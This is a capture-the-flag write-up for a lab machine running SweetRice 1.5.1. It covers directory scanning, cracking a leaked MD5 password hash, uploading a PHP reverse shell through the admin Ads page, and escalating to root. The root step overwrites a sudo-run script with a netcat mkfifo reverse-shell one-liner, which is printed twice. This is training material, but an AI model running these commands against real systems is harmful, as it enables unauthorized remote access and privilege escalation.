Throughout this writeup, I will reference the machine IP address as 10.10.10.10.
I started with a network scan using rustscan.
rustscan -a 10.10.10.10 --ulimit 5000 -- -sC -sV runs a rustscan on the specified IP address and then pipes it into nmap using the specified args after the
--: in this case version checking and script checking.
With this, there are two open ports on the machine. 22 (ssh) and 80 (http). I started by browsing to the web-page, but it was just the default Apache installation page. So, I then ran feroxbuster to check for any other interesting directories on the server. The only directory found was
/content/, with multiple subdirectories:
/content/attachments, etc. Browsing to http://10.10.10.10/content reveals the website is hosting SweetRice.
The next thing I did was look in the
/content/inc directory, as that can usually include core-components to the website, like database logins if not setup properly. I found two interesting files. 1)
latest.txt which included just “1.5.1”, which I assume was the SweetRice version. And
mysql_backups which had a mySQL backup. First, I looked up SweetRice 1.5.1 vulnerabilities, and found an Arbitrary File Upload. This exploit requires a username and password to use, so let’s find it.
In the backup file, we can find the username and a hashed password. All we have to do is run the hash through JohnTheRipper or Hashcat and we will crack it.
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
With the username and password, we can now run the exploit. I first started by getting a PHP reverse shell from pentestmonkey and started a listener with
ncat -lvnp 8888. I ran
python3 exploit.py and gave the username, password, and file to upload, and it said it uploaded successfully. However, when browsing to http://10.10.10.10/content/attachments/rev.php I was given a file not found, so the exploit didn’t seem to be working.
I then went to http://10.10.10.10/content/as and logged in to the administrator account. I did some digging and noticed that you can go to the Ads section and upload code. So, I uploaded the PHP reverse shell and started listening again, and went to http://10.10.10.10/content/ads/rev.php and was given a reverse shell!
whoami reveals we are www-data, and doing
cd /home and then
ls shows an
itguy home folder.
ls itguy will reveal our user.txt which can be accessed via
We can start with
sudo -l to see what all www-data can run as sudo. The only thing is a perl script,
backup.pl. We can analyze the backup.pl file with
cat and notice it runs a shell command,
/etc/copy.sh. We can
cat this and see it runs:
1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.1 5554 >/tmp/f
So, we have a shell reverse-shell that we can access as sudo. We just need to modify the IP address to ours. I first tried using nano, but it wouldn’t work. vim and vi didn’t work either. The only solution I could think of was to overwrite the file with echo:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 5554 >/tmp/f" > /etc/copy.sh.
Now, we will create another listener with
ncat -lvnp 5554 and run
sudo /usr/bin/perl /home/itguy/backup.pl which will give us the root shell. We can then
cd ~ and
cat root.txt to get the flag.